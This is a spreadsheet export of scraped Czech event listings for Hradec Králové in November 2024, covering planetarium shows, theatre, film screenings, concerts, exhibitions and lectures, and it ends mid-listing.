472 678. 08.listopadu - pátek od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Living Worlds · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Living Worlds. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. David DrábekRežie: David Drábek 08.listopadu - pátek od 19:00 hodin Divadelní zpracování skandální rozhlasové hry, která rozpoutala lavinu soudních žalob a mediálních emocí, aby se nakonec stala nejstahovanějším pamlskem na internetu a v anketě posluchačů rozhlasovou hrou roku. Atletická královna Milena už chřestí svými zlatými šperky a blíží se k Vám. Explozivní story o mistrovství světa, o zvedání trakařů i prvních lásek, o osudovém lyžařském kurzu a hororovém soustředění v Horažďovicích … ano, i o setkání s nedostižnou legendou Radmilou… A k tomu všemu zpívá LIVE Karel Hála , doktor Cvach míchá anabolické steroidy, Jiřina Švorcová recituje o pionýrském odznáčku v intimních partích a Štěpánka Haničincová pomáhá čertíku Bertíkovi odvelet do pekel soudruhy Husáka a Štrougala… Když přidáte navíc srdceryvnou výpověď zfetované laboratorní myši, dojde vám jedno: Pokud rozhlasová verze způsobila pobouření, tak divadelní verze opupínkuje celou českou kotlinu!!! Délka představení 2:50 s přestávkou. 430 vstupné 390 Kč, 430 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-08 19:00:00 2024-11-08 20:30:00 08.listopadu - pátek od 19:00 hodin Vyrážím na podzimní stand up tour po Hradci ! Tak se zamnou vyražte zasmát do vašeho oblíbeného podniku. Druhou zastávkou bude můj oblíbený Pavian Pub. Těšit se můžete na zbrusu novou show, nové vtipy, improvizaci s publikem, skvělou atmosféru a velký výběr piv . Letní stand upy měli úspěch, tak se těším, že to spolu roztočíme i na podzim. 08.listopadu - pátek od 20:00 hodin KURZ TANCE A SPOLEČENSKÉ VÝCHOVY MLÁDEŽE PRODLOUŽENÉ LEKCE - KURZ A 27. září I. Prodloužená 20:00 - 23:00 hod. - KVĚTINOVÁ Partner přinese partnerce jednoduchou vazbu květin, partnerka přinese partnerovi kapesníček s vyšitým monogramem. 25. října II. Prodloužená 20:00 - 23:00 hod. - ZLATÁ ŠEDESÁTÁ Partner i partnerka vyrobí 10 ks náhrdelníků z jednoduchých materiálů, jimiž během večera dekorují své tanečníky. Večer se nese v duchu šedesátých let minulého století, čemuž bude přizpůsoben i oděv tanečníků. Uvítáme i zapojení rodičů. 08. listopadu III. Prodloužená 20:00 - 23:00 hod. - VZPOMÍNKA NA STARÉ ČASY Chlapci i dívky si opatří pokrývku hlavy: klobouk, čelenku s pérem, klobouček, aj. Cena vstupenky: 200 Kč. War CorrespondentVálečný zpravodaj 08.listopadu - pátek od 20:15 hodin Celovečerní dokument přináší pohled na život a práci jednoho z nejvýznamnějších českých válečných zpravodajů Martina Dorazína . Znepokojující snímek režisérů Davida Čálka , Benjamina Tučka a producenta Václava Flegla vypráví osudy lidí, které válka přímo zasahuje, nabízí pohled na současný konflikt na Ukrajině , upozorňuje na širší kontext války a na význam válečné žurnalistiky. Prostřednictvím reportéra Martina Dorazína , skrz jeho postavu, objevujeme běžný život obyčejných lidí, dlouhodobě vystavených dopadům války. Ukazujeme sílu, která ve skutečnosti rozhoduje války. Není to vítězství na frontě, ale odolnost zázemí – ať už zvítězí jakákoli strana, lidé budou stejně pořád žít tam, kde žili. Téma odolnosti společnosti objevujeme očima válečného zpravodaje, prostřednictvím jeho práce se zvukem v rozhlasových reportážích. Ve filmu odkazujeme i na mimoválečný kontext – společnost je tak silná, jak silný je její nejslabší jedinec. Prohra většinou nenastává tam, kde se lidi semkli, protože samotné semknutí zvyšuje šanci na přežití celku. To je téma, které promlouvá i ke společnosti, válkou přímo neohrožené. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-08 20:30:00 2024-11-08 22:11:00 John Wick 08.listopadu - pátek od 20:30 hodin Říká se: "Nedráždi hada bosou nohou". John Wick je zabiják na odpočinku, přesně ten typ chlápka, kterému je lepší se vyhnout. Vloupat se mu do domu, ukrást auto a zabít milovaného psa, to se prostě nemělo stát. Střední zlodějíčkové to nevěděli, jejich bossové v podsvětí ale ano. A musí jednat. Takže zatímco se John Wick vydává na svou drsnou vendetu, stává se zároveň terčem svých bývalých kolegů - nájemných zabijáků. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_633_3239878303_ff1e9f145cd46c4b8f83.html</t>
  </si>
  <si>
    <t>ff1e9f145cd46c4b8f83</t>
  </si>
  <si>
    <t>Kalendarium 35. VÝROČÍ SAMETOVÉ REVOLUCE – 1989: CHCEME DÝCHAT 05.listopadu - úterý od 17:00 hodin Promítání filmu Karla Strachoty o normalizaci a listopadové revoluci v severočeských Teplicích . Kdysi krásné lázeňské město, jemuž se přezdívalo Malá Paříž , je zdevastované, stejně jako celé severozápadní průmyslové pohraničí. Archivní záběry a dobové materiály dokumentují tehdejší každodennost. Film vrcholí demonstracemi, které v Teplicích kvůli katastrofálnímu znečištění životního prostředí začaly týden před 17. listopadem 1989 a které se následně proměnily v politické protesty. Přihlášení na slezske@knihovnahk.cz. Vstup volný. Pavla Apostolakikonferenční sál 05.listopadu - úterý od 17:30 hodin Rakousko je nádherná země plná přírodních, historických a gastronomických pozoruhodností. Někdy jsou však skryté oku návštěvníka. S Pavlou Apostolaki poznáte utajené skvosty Rakouska . Vypravíte se do zlatého Innsbrucku i hudebního Eisenstadtu . Oslní Vás lesk křišťálů ve Wattens, úchvatný zámek Ambras a magické termální lázně Rogner Bad Blumau. Zažijete vodní hrátky s arcibiskupem, korutanskou cestu do nebes a nakonec ochutnáte soví víno v Burgenlandu . Anora 05.listopadu - úterý od 17:30 hodin Proč by sexuální pracovnice nemohla toužit po opravdové lásce? Anora (Mikey Madison) je ještě tak naivní, že takový sen má. Když si v klubu její společnost objedná mladý a bohatý Rus Ivan, zajiskří to mezi nimi a po pár týdnech si říkají ano na spontánní svatbě ve Vegas . Je možné, že Anora našla svého prince na bílém koni? Ivanovi rodiče si to nemyslí. Strhující, vtipná a šílená jízda režiséra Seana Bakera (The Florida Project) získala Zlatou palmu v Cannes a první diváci ji označují za minimálně stejně zábavnou podívanou jakou je jiný vítěz stejné ceny, Trojúhelník smutku. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-05 18:00:00 2024-11-05 20:00:00 FACKA(P)! VOL II. 05.listopadu - úterý od 18:00 hodin FACKA(P)! vol. II, večer, kde se zajímaví spíkři z řad umělců, sportovců, podnikatelů, influencerů či veřejně známých osobností s vámi podělí o své (nejen) byznysové pleskance aka facky. IVO ŠMOLDAS A HOSTÉ - TALK SHOW 05.listopadu - úterý od 19:00 hodin Zveme Vás na volné pokračování zábavného pořadu filozofa, básníka, kulturního publicisty a scenáristy Ivo Šmoldase a jeho hostů z řad známých tváří českého showbyznysu. Pořad je založen na humorném a originálním vyprávění životních příběhů jak ze soukromého, tak i pracovního života Ivo Šmoldase a hostů. 4 KLAVÍRY BEDŘICHA SMETANY 05.listopadu - úterý od 19:00 hodin PETROF Gallery s hrdostí uvádí jeden z nejprestižnějších koncertů letošního roku. Srdečně vás zveme na jedinečný koncert „4 klavíry Bedřicha Smetany “, který se uskuteční 5. listopadu 2024. Přijďte si vychutnat nezapomenutelný večer plný virtuózní klavírní hudby a oslav významných výročí. V roce 2024 si připomínáme 200. výročí narození Bedřicha Smetany , jednoho z největších českých skladatelů. Tento koncert je zároveň součástí celonárodního projektu Rok české hudby, který zdůrazňuje bohaté hudební dědictví České republiky . Navíc slavíme 160. výročí založení společnosti PETROF , která je synonymem kvality a tradice ve světě klavírní výroby. Na programu budou skladby Bedřicha Smetany určené pro 2 až 4 klavíry na 4, 8 nebo dokonce 16 rukou. Představí se vám jak zralí virtuózové, tak i velké české klavírní naděje, kteří svým uměním vzdají hold tomuto hudebnímu géniovi. Nenechte si ujít tuto výjimečnou příležitost zažít hudbu Bedřicha Smetany v unikátním provedení, které spojuje zkušenost a mladistvou energii. Vystupující Ivo Kahánek – klavír Martin Kasík – klavír Igor Ardašev – klavír Renáta Ardašev -Lichnovská – klavír Nora Lubaddová – klavír Klára Gibišová – klavír Denis Stenafov – klavír Jan Schulmeister – klavír Program Návštěvníci se mohou těšit na to nejlepší z tvorby Bedřicha Smetany , včetně proslulé symfonické básně Vltava ve skladatelově úpravě pro 2 klavíry na 4 ruce, předehry k Prodané nevěstě pro 4 klavíry a mnoho dalších krásných skladeb v úpravě pro 4, 8 nebo dokonce 16 rukou. Dress code Lucy Kirkwood a kol.Režie: Petr Štindl 05.listopadu - úterý od 19:00 hodin „Problém není v tobě, ale ve mně.“ Nejčastější věta, která se říká během rozchodu. Za tu druhou nejčastější lze považovat otázku: „Je v tom někdo jiný?“ Za třetí potom: „Ty mě už nemiluješ?“ Lze vůbec důstojně ukončit vztah? Je lepší tzv. kopačky dát, nebo je dostat? Šest anglicky píšících dramatiků vytvořilo originální hru, která zkoumá rozchod jako společenský fenomén. Inspirovali se skutečnými příběhy, a přesto se jim povedlo komediálním způsobem zachytit jedny z nejzásadnějších životních momentů. Tento koktejl postav a příběhů vás zaručeně pobaví. A už jste někdy přemýšleli nad tím, zda svatbou to končí nebo začíná? 290 vstupné 290 Kč | STUDIO BESEDA | KLICPEROVO DIVADLO o.p.s. STUDIO BESEDA 2024-11-05 19:00:00 2024-11-05 20:30:00 05.listopadu - úterý od 19:00 hodin FILHARMONIE HRADEC KRÁLOVÉ VE SPOLUPRÁCI S DIECÉZNÍ CHARITOU HRADEC KRÁLOVÉ BENEFIČNÍ KONCERT Pro výstavbu Lůžkového hospice s odlehčovací službou v Hradci Králové OZVĚNY TCHAJ-WANU Prodaná nevěsta T 93, předehra Ludwig van Beethoven Houslový koncert D dur op. 61 Li Yuan-Chen Resounding The Singing Voice of Mt Ali Igor Stravinskij Pták Ohnivák, suita z baletu (1919) Yu-Chien Tseng housle 05.listopadu - úterý od 19:00 hodin MISTR EXTRALIGY NA SLAVII ! ČTVRTFINÁLE CHANCE ČP: TJ SLAVIA HK – VK JIHOSTROJ ČESKÉ BUDĚJOVICE KDY: Úterý 5. listopadu od 19 hodin KDE: Hala TJ Slavia HK, Orlická kotlina VSTUPNÉ: 60 Kč, děti do 18 let mají vstupné zdarma, na utkání platí letošní permanentka Utkání roku je tu! Po loňské účasti ve Final Four Chance Českého poháru jsme byli nasazeni přímo do čtvrtfinále, ve kterém sehrajeme dvojutkání proti aktuálními mistrovi ČEZ Extraligy mužů, družstvu VK Jihostroj České Budějovice . První utkání proti týmu plnému zahraničních hvězd a reprezentantů jsme sehráli 22. října v Českých Budějovicích , kde jsme po výborném výkonu dokázali vzít favoritovi set a prohráli po boji 1:3. Listopadová odveta pak rozhodne o postupujícím do letošního Final Four. Přijďte podpořit hradecké volejbalisty v utkání roku a užít si volejbalový svátek na Slavii . Těšíme se na vaši skvělou podporu, která bude potřeba více než kdy jindy. Těšit se můžete na utkání hrané na centre courtu haly, tradiční tipovačku, stánek od restaurace Slávka, Fans Volley HK a další aktivity. Nezapomeňte sledovat sociální sítě pro veškeré informace o utkání. 690 vstupné 650 Kč, 690 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-05 20:15:00 2024-11-05 22:15:00 Conclave 05.listopadu - úterý od 20:15 hodin Kardinál Lawrence je pověřen vedením jedné z nejtajnějších a nejstarších událostí na světě - volbou nového papeže, při níž se ocitá v centru spiknutí, které by mohlo otřást samotnými základy církve. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-05 20:30:00 2024-11-05 22:50:00 The Substance 05.listopadu - úterý od 20:30 hodin eden z nejdiskutovanějších filmů letošního roku vyháněl diváky ze sálu na všech letních filmových festivalech. Jak zapůsobí na vás? Satirický horor režisérky Coralie Fargeat si na festivalu Future Gate můžete užít v předpremiéře. Stárnoucí hvězda televizních obrazovek Elisabeth Sparkle ( Demi Moore ) dostává možnost vyzkoušet zázračnou substanci, díky které může být mladší a krásnější. Touha změnit přirozený chod věcí ale nikdy není jen tak, proto to má háček – Elisabeth se se svým novým, lepším já (Margaret Qualley) musí dělit o čas. Šokující satiru tematizující naši posedlost dokonalostí musíte vidět, pokud chcete být v obraze. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_634_3239872308_0ebd08ed88add9936dc1.html</t>
  </si>
  <si>
    <t>0ebd08ed88add9936dc1</t>
  </si>
  <si>
    <t>Shrnutí Kalendarium 19.prosinec - čtvrtek od 19:30 hodin Kulturní akce dne: 14. 11. 2024 2024-11-04 08:00:00 2024-11-30 12:00:00 FOTÍME EVROPU, JIŽ 20 LET! 14.listopadu - čtvrtek od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 14.listopadu - čtvrtek od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 14.listopadu - čtvrtek od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 14.listopadu - čtvrtek od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 14.listopadu - čtvrtek od 10:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169 (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 VÝSTAVA MODELŮ ŽELEZNIC 14.listopadu - čtvrtek od 11:31 hodin Od 9. Do 17. listopadu 2024 se na královéhradeckém hlavním nádraží uskuteční tradiční – letos již 39. výstava železničních modelů a kolejišť s mezinárodní účastí. Návštěvníci zde uvidí nejen modely od našich modelářů, ale například i kolejiště od německého kolegy a kolejiště velikosti TT od firmy Tillig. Ve spolupráci s německým Saským svazem modelářů bude stejně jako v loňském roce k dispozici dílnička pro nejmenší modeláře, kde si pod odborným vedením mohou postavit například domeček a ten si pak samozřejmě odnést na památku domů. V provozu bude velké klubové kolejiště HO – Velký Brod, tradiční kolejiště s motivem Ameriky a další menší, z nichž zajímavé bude určitě kolejiště ze stavebnice LEGO. Celkem se na výstavě budou malé vláčky prohánět na sedmi kolejištích. Pro ty nejmenší děti bude k dispozici v minulých letech velmi oblíbený hrací koutek, kam mohou dospěláci případně „odložit“ své ratolesti a v klidu si prohlédnout výstavu. Statické modely, ať už tovární, či našich modelářů budou ke zhlédnutí ve vitrínách a v případě zájmu bude možné v prodejně na místě zakoupit nejen některé nové i použité tovární modely, ale třeba i omalovánky, vystřihovánky a klubový stolní kalendář na rok 2025. Ten bude možné i vyhrát v případě, že na zadní stranu vstupenky napíšete své telefonní číslo a vhodíte ji při odchodu do schránky u pokladny. Každý den se na jednoho návštěvníka usměje štěstí v podobě tohoto kalendáře. Přístup na výstavu je z 1. nástupiště ve všední dny od 14 do 18 hodin, o víkendu a ve svátek od 9 do 18 hodin. Dopolední hodiny ve všedních dnech jsou vyhrazeny pro předem objednané skupiny školních či předškolních dětí a jsou doplněny i programem. Objednat prohlídku je možné telefonicky nebo SMS zprávou na čísle 602 406 234. Vstupné na výstavu je pro dospělého 100 Kč a pro děti 50 Kč. AQUAHRÁTKY PRO PŘEDŠKOLÁKY S RODIČI 14.listopadu - čtvrtek od 16:00 hodin Ve čtvrtek 14. 11. odpoledne, od 16.00 do 19.00 hodin, bude v aquacentru v Městských lázních na mělčině relaxačního bazénu animační program včetně cvičení pro rodiče s dětmi předškolního věku. Cvičení začne po skončení vlnobití, tedy přibližně od 16.10 do 16.30, 17.10 – 17.30, 18.10 – 18.30. V mezičasech cvičení si děti budou moci za asistence animátora hrát, malovat, tancovat, řádit ve vodě s nafukovacími hračkami, nebo se občerstvit na baru, kde bude pro děti speciální akční nabídka. To vše je v ceně vstupného! Nenechte si ujít tuto příležitost k relaxaci a zábavě pro celou rodinu! Těšíme se na vás! KLUBÍK TUČŇÁK – DALILA A VÝTAH BEZ DVEŘÍ 14.listopadu - čtvrtek od 16:00 hodin Kouzlo otočného výtahu představí Dalila, dívka bydlící v domě plném podivínů. Je pořádně zvídavá a všechny záhady se spolu s dětmi rozhodne vypátrat. Čekají vás výtvarné, logické a veselé úkoly na cestě za poznáním jinakosti, originality a hledáním nových řešení v doprovodu knihy Dalila a výtah bez dveří. Pro děti od 3 do 6 let. Vstupné dobrovolné. aneb jak jsem vyrůstal za železnou oponou 14.listopadu - čtvrtek od 17:00 hodin NA MOTIVY STEJNOJMENNÉ KNIHY PETRA SÍSE . NAŠE MINULOST ZŮSTÁVÁ V NÁS A JE STÁLE ŽIVÁ. INSCENACE O NADĚJI, VE KTEROU NESMÍME PŘESTÁVAT VĚŘIT. Zeď je zcela ojedinělou světově ceněnou knihou, která dětem i jejich rodičům přibližuje léta 1948-1989, dobu komunismu a socialismu, kdy za "železnou oponou" v Československu žili, pracovali a snili obyčejní lidé. Autobiogra cký příběh výtvarníka, ilustrátora a autora knih pro děti Petra Síse je o posedlosti hudbou a malováním, o vládě ideologie, tíze dějin a potřebě svobody. "Knížka Petra Síse je povinnou četbou pro děti (i jejich rodiče), které si myslí že svoboda je jednoznačně daná věc." Václav Havel "Je to má zpráva z minulosti a současně i varování, co by se mohlo opět stát. Zdi se stavějí pořád dál, ať je to v Izraeli , na mexické hranici nebo v Ústí nad Labem ." Petr Sís Divadelní představení na motivy knihy Zeď je hudebně vizuální groteskou o zcela negroteskní minulosti, vyprávěnou pro děti očima chlapce, který miluje barvy a né šeď, hudbu a né ustrašené ticho, věří ve sny a má naději. Tvůrci se prostřednictvím výtvarného vyjádření, hudby, animací, komiksu, loutkářských akcí a hravým hereckým projevem, chtějí přiblížit dětskému vnímání. Přiblížit nejmladší generaci přitom nelehkou dobu totality a vyvolat následnou diskuzi s učiteli a rodiči o tématech útlaku a svobody. Na podzim roku 2019 si navíc připomínáme 30 let od Sametové revoluce a naše inscenace chce přispět k mezigeneračnímu pochopení a přiblížení tohoto významného mezníku v dějinách České republiky . Inscenace se zaměřuje především na interakci mezi herctvím a animací, hudbou a pohybem. Koncept, scénář, režie: Miřenka Čechová, Dominika Špalková Hudba: Martin Tvrdý Hrají: Jazmína Piktorová, Milan Hajn Délka představení: 40 minut 14.listopadu - čtvrtek od 17:00 hodin Mgr. M. Schuster Představte si, že listujete starým albem a objevujete fotografie, které nikdy nespatřily světlo světa. Příběhy lidí, jejichž hlasy byly umlčeny, čekají na to, aby byly vyslyšeny. Zveme Vás na jedinečnou přednášku Mgr. Michala Schustra na téma Dějiny Romů a jejich pronásledování během 2. světové války. Prožijte s námi cestu časem do meziválečného Československa , kde se seznámíte s bohatou kulturou a tradicemi Romů. Odhalte tragické osudy během temných let 2. světové války, které často zůstávají na okraji dějin. Nejedná se o běžnou přednášku, ale o emotivní výpravu do minulosti, která Vás přiměje zamyslet se nad významem paměti a lidskosti. Vstup volný. 14.listopadu - čtvrtek od 17:00 hodin Vernisáž v Galerii Na Hradě 14. 11. v 17:00, Na Hradě 91, Hradec Králové hudební vystoupení: kapela Gankino Quintet Hlavní výstava v Galerii Na Hradě potrvá od 15. 11. 2024 do 17. 1. 2025. V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 14.listopadu - čtvrtek od 17:30 hodin Legendární představení pro všechny generace diváků! Zapomeňte na dělení sangvinik, cholerik… ne. Generace dětí řešily, kdo je Fifinka, kdo Pinďa, kdo Myšpulín a kdo Bobík! Autor a režisér inscenace David Drábek považuje za jeden z největších životních úspěchů toto: „Měli jsme partu a obsazovali ty čtyři role. A já byl obtloustlý a celý Bobík. Ale chtěl jsem tak moc hrát Myšpulína, že jsem ostatním vsugeroval, že se na Bobíka nejvíc hodí vyzáblý klučina s vyčnívajícími řezáky. Od toho momentu bylo jasné, že ze mne vyroste politik nebo režisér.“ Historie legendárních čtyř kreslených přátel začala v roce 1969, kdy se v redakci nakladatelství Orbis objevil čtyřiadvacetiletý Jaroslav Němeček s prvním příběhem, nazvaným Vynález prof. Myšpulína. Původně vůbec nepočítal s tím, že by příhody Čtyřlístku mohly mít nějaké pokračování, ale velký zájem čtenářů si vynutil další díly. A od té doby se tento komiks stal naprosto zásadním průvodcem naším dětstvím nejen let sedmdesátých a osmdesátých. Všichni jsme cestovali v představách do Třeskoprsk i k Blaťáku, do středověku i do hlubin oceánu. Máme teď pro vás pot-pourri všech zásadních fetišů: nebudou chybět roboti, zmenšovací pilulky ani yetti! Délka představení 1:30 s přestávkou. 320 vstupné 280 Kč, 320 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-14 17:30:00 2024-11-14 19:00:00 14.listopadu - čtvrtek od 17:30 hodin Rezervace: edukace@galeriehk.cz Pro dospělé a seniory Pohybový workshop pro dospělé bez ohledu na věk a taneční zkušenost. Zažíváte někdy pocit roztěkanosti, kdy hlava jede na plné obrátky a vy nevíte, co dělat dřív? Chcete se naučit zpomalit, zpřítomnit a uvolnit? Přidejte se k nám. Čeká nás hravost a radost z intuitivního pohybu bez předem připravené choreografie. 14.listopadu - čtvrtek od 18:00 hodin Kanárské ostrovy - tropy na dosah ruky Kanárské ostrovy nabízejí celoroční možnosti rekreace. Společně se vypravíme na největší ostrov tohoto souostroví Tenerife. Prohlédneme si nejvyšší horu Španělska , vavřínové lesy i sopečné krajiny plné endemitů. Ostrov nabízí příležitost k aktivnímu i pasivnímu odpočinku pro celou rodinu. Přednáší: RNDr. PhDr. Ivo Králíček , Ph.D. Zdroj obrázku: Escarlati; Wikipedia (volné dílo). Pořad vhodný pro dospělé a mládež od staršího školního věku. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. ŽENA PRACUJE VE TMĚ – PÁSMO HUDBY A POEZIE 14.listopadu - čtvrtek od 18:00 hodin Martina Dobiášová propojuje vypravěčství, hereckou performance a předávání příběhu pomocí hudby. Formát vystoupení představuje jednoho aktéra, vypravěče, který přichází z prostoru mýtu, aby přinášel univerzální příběh a organicky ho propojoval se svým současným životem, s aktuálním děním i s fragmenty životních peripetií publika. Vstup volný. FELINOTERAPIE ANEB LÉČBA KOČKOU 14.listopadu - čtvrtek od 18:00 hodin Znáte felinoterapii? Že ne? Tak přijďte na přednášku a Helena Rückerová vám ráda metodu s kočičími terapeutkami představí. Na závěr zodpoví i vaše dotazy týkající se felinoterapie, koček sibiřských a jejich chovu. Vstupné dobrovolné. Pořadatel: Agentura Butterfly s.r.o. 14.listopadu - čtvrtek od 19:00 hodin Autorská módní přehlídka populárního a uznávaného dua PONER bude k vidění exkluzivně v Hradci Králové , v moderním prostředí PETROF Gallery. Za značkou PONER stojí sourozenci Nikol a Jakub, kteří propadli módě a vybudovali si svou módní značku. Najdete velmi málo prestižních společenských akcí, na kterých se neobjeví někdo v šatech s rukopisem značky PONER. Historie jejich činnosti je překvapivě krátká, ale nesmírně dynamická. V letošním roce oslaví Ateliér PONER již 10 let své existence. Na jejich tvorbě se projevuje vztah k tradičnímu řemeslu - potrpí si na ruční zdobení výšivkami, krajkou, korálky i kamínky. Důraz je kladen na výběr nejkvalitnějších látek, zejména hedvábí a krajek. Jejich návrhy jsou určeny nejen pro českou klientelu, ale svou značku si tito mladí sourozenci budují také v zahraničí. Seznam slavných, které tato sourozenecká dvojice neoblékla by byl podstatně kratší než ten, koho oblékla či obléká pravidelně - Dagmar Havlová , Lucie Bílá, Marek Ztracený , Alena Mihulová , Taťána Kuchařová a mnoho dalších. Pořadatelem je Agentura Butterfly s.r.o. 1500 vstupné 1200 Kč, 1500 Kč | Petrof Gallery | Ostatní pořadatelé Petrof Gallery 2024-11-14 19:00:00 2024-11-14 20:30:00 14.listopadu - čtvrtek od 19:00 hodin Co se vám vybaví, když se řekne Nový Zéland ? Pán Prstenů? Rugby ? Hakka? Nespoutaná příroda? Odteď to bude Te Araroa! Trail napříč Zélandem , který není jen o pěkných místech a laskavých lidech. Je o DOBRODRUŽSTVÍ! Provede vás neprostupnými lesy, bažinami i koryty řek. Budete se smát, plakat i nadávat. Potkáte spřízněný duše. Jára Cimrman by to nejspíš nazval syrovým pohádkovým hororem, ale taková zkrátka je Te Araroa. Možná občas otestuje dno vaší psychicky, ale nakonec vám ukáže, že jste silnější než jste si mysleli. Proč vás na TA žádný evropský trail nepřipraví? Jaké je jít trasu "proti proudu"? Co jsou ďábelská kuřata a proč je viním ze zkázy stanu? To vše se dozvíte na přednášce! Pojďte si se mnou prožít tohle dobrodružství! Těším se na vás! Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_635_3239872107_fc04a50842a42f01ef61.html</t>
  </si>
  <si>
    <t>fc04a50842a42f01ef61</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 09. 11. 2024 2024-11-09 08:00:00 2024-11-09 12:30:00 09.listopadu - sobota od 08:00 hodin - začátek výlovu v 8:00 - prodej čerstvých ryb od 9:00 do 12:30 - u přížitosti výlovu rybníka Výskytbude povolen vjezd automobilem až na odstavnou plochu za hájovnou U Dvou závor - občerstvení zajištěno FOTÍME EVROPU, JIŽ 20 LET! 09.listopadu - sobota od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 09.listopadu - sobota od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící 